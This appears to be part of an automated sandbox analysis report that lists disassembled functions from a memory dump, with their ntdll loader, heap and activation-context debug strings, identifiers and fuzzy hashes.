                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                  • API String ID: 0-3223716464
                                                                                  • Opcode ID: 2a276cce3bdc789c290b7279097f0517dd3dc56f847e9efe8e77e370af3c65c8
                                                                                  • Instruction ID: 80b5ccbb8d7ae8b2143c24cda6116f7e750be4d1f27c2437f06e5d60b82cc371
                                                                                  • Opcode Fuzzy Hash: 2a276cce3bdc789c290b7279097f0517dd3dc56f847e9efe8e77e370af3c65c8
                                                                                  • Instruction Fuzzy Hash: 1A91067164535BAFEB22EF6C8884B1BB7E4AF56718F0D0418FA45EB241D7309E40CB92
                                                                                  Function 0181EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                  • API String ID: 0-1109411897
                                                                                  • Opcode ID: 78ddb8062f02a66ec51923d0d912b0d63bb75823cfdb448458ad8e7239839c92
                                                                                  • Instruction ID: d0d2714ccb90e9b4bd7446a2fc9ab54a3a011737ea18a36aa7accec58ca4ecf1
                                                                                  • Opcode Fuzzy Hash: 78ddb8062f02a66ec51923d0d912b0d63bb75823cfdb448458ad8e7239839c92
                                                                                  • Instruction Fuzzy Hash: 7FA24775A0562A8FDB65CF18CC98BA9BBB9AF45304F1442E9D90DE7295DB309F84CF00
                                                                                  Function 0180F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                  • API String ID: 0-523794902
                                                                                  • Opcode ID: 1a09383e509363a35f4a5ff6a40fbba6dcc0776d110bfdf7772b00a6eb8e2749
                                                                                  • Instruction ID: 6d47af9412080d427c9fef46be010e0f2eea7f0b1f88230f6e9e1a5af4e1537b
                                                                                  • Opcode Fuzzy Hash: 1a09383e509363a35f4a5ff6a40fbba6dcc0776d110bfdf7772b00a6eb8e2749
                                                                                  • Instruction Fuzzy Hash: 3342027520874A9FD766CF28C884A2ABBE9FF88304F04856DF685CB381D734DA41CB52
                                                                                  Function 0181ADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                  • API String ID: 0-4098886588
                                                                                  • Opcode ID: 5cb8bfe7d32e64bd0383f9b26eb22cdc8542ee6f25390b5fef7e6a28bca01920
                                                                                  • Instruction ID: 5e171ed027c2967cdb80e02ed48ceb618a4db30ca4796b9dfc8c2075415371e4
                                                                                  • Opcode Fuzzy Hash: 5cb8bfe7d32e64bd0383f9b26eb22cdc8542ee6f25390b5fef7e6a28bca01920
                                                                                  • Instruction Fuzzy Hash: 4732B072A0026D8BDB26CB18CC94BEEBBB9BF44344F1441EAE849E7255D7319F818F41
                                                                                  Function 0182B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                  • API String ID: 0-122214566
                                                                                  • Opcode ID: 875b18bd0f7626e73022dfe89baec5b4a6bffa99e17519583e8f627c9249719f
                                                                                  • Instruction ID: f9d67ca7ae85558844890b85e7d96d91dab1403635e9a1f0d26b236bba517a46
                                                                                  • Opcode Fuzzy Hash: 875b18bd0f7626e73022dfe89baec5b4a6bffa99e17519583e8f627c9249719f
                                                                                  • Instruction Fuzzy Hash: 82C14A71A0122A9BDB268B6CC8D9B7EBBE5BF46314F144169ED01DB291D7B0CBC4C391
                                                                                  Function 018463FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-792281065
                                                                                  • Opcode ID: 84ea42d0427d8098e51347134c84722f458f46190c90e4397663a27e5f2f0b1d
                                                                                  • Instruction ID: f64ee4de67e706b9dffce92461f7f5e4ce54a670640697bccf6cc8deb448db32
                                                                                  • Opcode Fuzzy Hash: 84ea42d0427d8098e51347134c84722f458f46190c90e4397663a27e5f2f0b1d
                                                                                  • Instruction Fuzzy Hash: 20912A71B0431ADFEB36EF5CD884B6A7BA1BB51B24F14011DE904EB281EB749B41C791
                                                                                  Function 0180645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01869A01
                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 018699ED
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01869A11, 01869A3A
                                                                                  • apphelp.dll, xrefs: 01806496
                                                                                  • LdrpInitShimEngine, xrefs: 018699F4, 01869A07, 01869A30
                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01869A2A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-204845295
                                                                                  • Opcode ID: cd9e854e3e9d25f419066793a5ba78a3c419e544b8892d7d9e9cf018f676cc05
                                                                                  • Instruction ID: 8db7d77b9f8415595f83556471029f7db4729f20ca936d5e16e08ac3be09f2cc
                                                                                  • Opcode Fuzzy Hash: cd9e854e3e9d25f419066793a5ba78a3c419e544b8892d7d9e9cf018f676cc05
                                                                                  • Instruction Fuzzy Hash: F951DF716183089FE722DF28C851A6BB7E8FB84748F10091DF985D72A1E630EB44CB93
                                                                                  Function 0184C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • LdrpInitializeProcess, xrefs: 0184C6C4
                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01888181, 018881F5
                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 018881E5
                                                                                  • Loading import redirection DLL: '%wZ', xrefs: 01888170
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0184C6C3
                                                                                  • LdrpInitializeImportRedirection, xrefs: 01888177, 018881EB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                  • API String ID: 0-475462383
                                                                                  • Opcode ID: 093018e77ba5302d6e886f441cfc2a24d284a23a69fc325f24f585757b69e943
                                                                                  • Instruction ID: f76e03890b53b9ad214fafca1a285f5ba3feafce634a26ca1d8a80bd43ddab55
                                                                                  • Opcode Fuzzy Hash: 093018e77ba5302d6e886f441cfc2a24d284a23a69fc325f24f585757b69e943
                                                                                  • Instruction Fuzzy Hash: B731DFB16497469FD325EA2CD94AE1AB7D9EFD4B10F04051CF941EB291EB20EE04C7A3
                                                                                  Function 01842674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018821BF
                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01882180
                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 01882160, 0188219A, 018821BA
                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01882178
                                                                                  • SXS: %s() passed the empty activation context, xrefs: 01882165
                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0188219F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                  • API String ID: 0-861424205
                                                                                  • Opcode ID: 22ce77f9ca577ac69b8f6343ca7003ffcaaa762b2082f21b6b00f10f4e9c2d6b
                                                                                  • Instruction ID: f242ca0c12c3cff0d5d2346459d846729651271bb33575fd3f45388c2273d573
                                                                                  • Opcode Fuzzy Hash: 22ce77f9ca577ac69b8f6343ca7003ffcaaa762b2082f21b6b00f10f4e9c2d6b
                                                                                  • Instruction Fuzzy Hash: 5231377AB402197BEB25EA999C41F5BBF7ADF54B90F05405DBB04E7240D670AB00C7A1
                                                                                  Function 01829950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                  • API String ID: 0-3393094623
                                                                                  • Opcode ID: 34b3d188cfad24c3079b9302f52be8336902b15b6ac0e4a0a88b2aca4bd3515c
                                                                                  • Instruction ID: 0e9d34cb94b493539eb0397570ddbdd8aa657edccec75f196d801e09d2f5302c
                                                                                  • Opcode Fuzzy Hash: 34b3d188cfad24c3079b9302f52be8336902b15b6ac0e4a0a88b2aca4bd3515c
                                                                                  • Instruction Fuzzy Hash: FB026975908375CBD722CF28C08476BBBE5BF88718F44891EE989C7251E770DA84CB92
                                                                                  Function 0185096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 01852DF0: LdrInitializeThunk.NTDLL ref: 01852DFA
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01850BA3
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01850BB6
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01850D60
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01850D74
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 1404860816-0
                                                                                  • Opcode ID: 30734e16c85e9dc2a0ea5d8ed5c28ecead1fd62a838dbf173d77d1a9831a3c69
                                                                                  • Instruction ID: f2855c3a2ba5370fb6a3aa52b89f25b91d2ea77451147ac2e39e7f5cf35ee3d2
                                                                                  • Opcode Fuzzy Hash: 30734e16c85e9dc2a0ea5d8ed5c28ecead1fd62a838dbf173d77d1a9831a3c69
                                                                                  • Instruction Fuzzy Hash: D1425B71900715DFDB61CF28C880BAAB7F5FF44314F1445AAE989EB242E770AA84CF61
                                                                                  Function 01894F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                  • API String ID: 0-2518169356
                                                                                  • Opcode ID: 0edfcf9ac8df48c9ec19ca950e21fb80588c5a1f7d02b530486f5160419172fb
                                                                                  • Instruction ID: f1bd0f2e575b5cfb7b8ec9cb9e708e884cf161815b3ff67d25ed513db6dd27ec
                                                                                  • Opcode Fuzzy Hash: 0edfcf9ac8df48c9ec19ca950e21fb80588c5a1f7d02b530486f5160419172fb
                                                                                  • Instruction Fuzzy Hash: 6B91A072D0061A8BCF26CFADC880AAEB7B0FF49310F59416AE915E7350E775DA41CB91
                                                                                  Function 018270C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                  • API String ID: 0-3178619729
                                                                                  • Opcode ID: 65820116d962c0ff67d57f36be802c52afecfff15e149f2f9abc897f4e2ac3c7
                                                                                  • Instruction ID: 711afb2d753a2515b58f11fa642d7c44304c3c730c9152c4bafa12723ed5d74e
                                                                                  • Opcode Fuzzy Hash: 65820116d962c0ff67d57f36be802c52afecfff15e149f2f9abc897f4e2ac3c7
                                                                                  • Instruction Fuzzy Hash: AA13BF70A00669CFDB26CF69C4807A9BBF1FF59304F1481A9D949EB381D734AA85CF91
                                                                                  Function 0182A840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 01877D03
                                                                                  • SsHd, xrefs: 0182A885
                                                                                  • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 01877D39
                                                                                  • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 01877D56
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                                  • API String ID: 0-2905229100
                                                                                  • Opcode ID: adf0c32da88792305cacce0cdaf094839a6afc354bccc9803ece230c4e60ee15
                                                                                  • Instruction ID: df36e14f8247b2beecc5ad0728937421e40f25fcd2b3ebb8e7065f1181b9dd5e
                                                                                  • Opcode Fuzzy Hash: adf0c32da88792305cacce0cdaf094839a6afc354bccc9803ece230c4e60ee15
                                                                                  • Instruction Fuzzy Hash: A1D1C276A002299FDF2ACF99C8C06ADBBB1FF48314F19405AE915EB745D331DA80CB91
                                                                                  Function 0181A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                  • API String ID: 0-379654539
                                                                                  • Opcode ID: 4fed6672bb18ed7f7bc41cc48cff5cf8be49aa52069c63087cf7c6f13f5e0e22
                                                                                  • Instruction ID: eb3198686116a717b1a6f8aacc9b4ef6e144d8147bc6f78f02cc1ff9e197003a
                                                                                  • Opcode Fuzzy Hash: 4fed6672bb18ed7f7bc41cc48cff5cf8be49aa52069c63087cf7c6f13f5e0e22
                                                                                  • Instruction Fuzzy Hash: 2AC18E76109386CFD719CF58C084B6ABBE8BF84708F04496AF996CB259E734CB45CB52
                                                                                  Function 01848402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • LdrpInitializeProcess, xrefs: 01848422
                                                                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0184855E
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01848421
                                                                                  • @, xrefs: 01848591
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-1918872054
                                                                                  • Opcode ID: 190b846e2be583f54f6f1fe03270f761278223aa53987b1764af246dfd9742d3
                                                                                  • Instruction ID: ef2b7c2bac425c70caeb660fbc3137945f6b4492d334e95f8d66b560efcf4849
                                                                                  • Opcode Fuzzy Hash: 190b846e2be583f54f6f1fe03270f761278223aa53987b1764af246dfd9742d3
                                                                                  • Instruction Fuzzy Hash: AB918F71508349EFD721EF69CC41E6BBAE8FB89744F40092EFA84D2151EB34DA448B53
                                                                                  Function 01820C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 018755AE
                                                                                  • HEAP[%wZ]: , xrefs: 018754D1, 01875592
                                                                                  • HEAP: , xrefs: 018754E0, 018755A1
                                                                                  • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 018754ED
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                  • API String ID: 0-1657114761
                                                                                  • Opcode ID: e2c4225c55cb8817b4fe897dde5bd2f88146f8274462efb8d0c2bc5f545b5db9
                                                                                  • Instruction ID: f5a7d6092283311456108c909b633f09c80c71b50dff5834898bbb7e8017de7c
                                                                                  • Opcode Fuzzy Hash: e2c4225c55cb8817b4fe897dde5bd2f88146f8274462efb8d0c2bc5f545b5db9
                                                                                  • Instruction Fuzzy Hash: 00A1F37460471A9FD726CF28C480BBABBE1BF54304F148169F59ACB782D734EA85CB91
                                                                                  Function 0184273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018822B6
                                                                                  • .Local, xrefs: 018428D8
                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018821D9, 018822B1
                                                                                  • SXS: %s() passed the empty activation context, xrefs: 018821DE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                  • API String ID: 0-1239276146
                                                                                  • Opcode ID: a5cd0c2276816e81cb2d97150d229636edda9dd004b3d1a467e605a3dccb06a0
                                                                                  • Instruction ID: 4c90aa43cce8cc4c77d56802841537b48d162fc31793b254d6d4d83e063bfb16
                                                                                  • Opcode Fuzzy Hash: a5cd0c2276816e81cb2d97150d229636edda9dd004b3d1a467e605a3dccb06a0
                                                                                  • Instruction Fuzzy Hash: 6BA1BD3590422D9BDB25DF68D884BA9BBB2BF58354F1541EAE908E7351DB309F80CF90
                                                                                  Function 01844AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • RtlDeactivateActivationContext, xrefs: 01883425, 01883432, 01883451
                                                                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01883437
                                                                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0188342A
                                                                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01883456
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                  • API String ID: 0-1245972979
                                                                                  • Opcode ID: 24876fc006c2f1c1504b4a9f98a3d4d61ba491d263acafd257981958f94f1277
                                                                                  • Instruction ID: 2509c48079cc3dc0cd98774568082ad68429fc8d403b87f4ba42701c10df1409
                                                                                  • Opcode Fuzzy Hash: 24876fc006c2f1c1504b4a9f98a3d4d61ba491d263acafd257981958f94f1277
                                                                                  • Instruction Fuzzy Hash: 9D61343260071A9BD722DF1CC881B2AB7E5FFA4B10F18851DED55DB241DB30EA41CB96
                                                                                  Function 018164AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0187106B
                                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01871028
                                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018710AE
                                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01870FE5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                  • API String ID: 0-1468400865
                                                                                  • Opcode ID: 38e4904124e12869c52fd945bd661d96b623cf0e9e91fd4cfbad0dd76126fe66
                                                                                  • Instruction ID: 76bc3d84f3243a411bdaf568c986900837f1b72fbea2afcf436171021b8b42f7
                                                                                  • Opcode Fuzzy Hash: 38e4904124e12869c52fd945bd661d96b623cf0e9e91fd4cfbad0dd76126fe66
                                                                                  • Instruction Fuzzy Hash: A471CEB29043059FCB61DF18C884B977FACEF55754F140468F989CA28AE774D688CBD2
                                                                                  Function 0183245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • LdrpDynamicShimModule, xrefs: 0187A998
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0187A9A2
                                                                                  • apphelp.dll, xrefs: 01832462
                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0187A992
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2132478501.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_17e0000_lByv6mqTCJ.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-176724104
                                                                                  • Opcode ID: 49f4c2cb630d3c68b9845b7b73fbbb227dcabac455cbdf7f4ba376300a3fd040
                                                                                  • Instruction ID: 8c5aff4c8d17956b679563f4da531e4dc7696b0dbda45a82d344878111135057
